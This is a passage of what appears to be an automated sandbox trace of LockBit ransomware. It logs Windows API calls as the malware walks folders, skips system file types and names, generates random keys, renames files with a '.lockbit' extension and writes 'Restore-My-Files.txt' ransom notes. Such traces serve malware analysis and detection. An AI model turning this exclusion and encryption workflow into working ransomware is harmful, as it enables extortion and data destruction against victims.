dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0145.959] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.959] malloc (_Size=0x40068) returned 0x3df0008 [0145.959] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1348) returned 1 [0145.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0145.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0145.961] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0145.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.966] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.966] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.966] free (_Block=0x1fa2ed8) [0145.966] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.967] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.967] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c98, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152696.WMF", cAlternateFileName="")) returned 1 [0145.967] lstrcmpiW (lpString1=".", lpString2="J0152696.WMF") returned -1 [0145.967] lstrcmpiW (lpString1="..", lpString2="J0152696.WMF") returned -1 [0145.967] PathFindExtensionW (pszPath="J0152696.WMF") returned=".WMF" [0145.967] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.967] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.968] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.968] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152696.WMF") returned 1 [0145.969] lstrcmpiW (lpString1="ntldr", lpString2="J0152696.WMF") returned 1 [0145.969] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152696.WMF") returned 1 [0145.969] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152696.WMF") returned -1 [0145.969] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152696.WMF") returned -1 [0145.969] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152696.WMF") returned 1 [0145.969] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152696.WMF") returned -1 [0145.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.969] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned=".WMF" [0145.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.969] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.969] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.970] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.970] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF.lockbit") returned 72 [0145.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0145.974] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.975] malloc (_Size=0x40068) returned 0x1ff1e60 [0145.975] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7320) returned 1 [0145.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0145.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0145.976] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0145.978] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.978] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.978] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.979] free (_Block=0x1fa2ed8) [0145.979] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.979] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.979] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.979] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152698.WMF", cAlternateFileName="")) returned 1 [0145.979] lstrcmpiW (lpString1=".", lpString2="J0152698.WMF") returned -1 [0145.979] lstrcmpiW (lpString1="..", lpString2="J0152698.WMF") returned -1 [0145.979] PathFindExtensionW (pszPath="J0152698.WMF") returned=".WMF" [0145.979] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.979] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.979] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.979] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.980] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.981] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.981] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152698.WMF") returned 1 [0145.981] lstrcmpiW (lpString1="ntldr", lpString2="J0152698.WMF") returned 1 [0145.981] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152698.WMF") returned 1 [0145.981] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152698.WMF") returned -1 [0145.982] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152698.WMF") returned -1 [0145.982] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152698.WMF") returned 1 [0145.982] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152698.WMF") returned -1 [0145.982] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.982] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned=".WMF" [0145.982] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.982] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.982] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.983] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.983] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF.lockbit") returned 72 [0145.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0145.984] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.984] malloc (_Size=0x40068) returned 0x3d70450 [0145.984] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1208) returned 1 [0145.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0145.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0145.985] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0145.991] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.991] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.991] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.992] free (_Block=0x1fa2ed8) [0145.992] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.992] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.992] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152702.WMF", cAlternateFileName="")) returned 1 [0145.992] lstrcmpiW (lpString1=".", lpString2="J0152702.WMF") returned -1 [0145.992] lstrcmpiW (lpString1="..", lpString2="J0152702.WMF") returned -1 [0145.992] PathFindExtensionW (pszPath="J0152702.WMF") returned=".WMF" [0145.992] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.992] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.993] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW 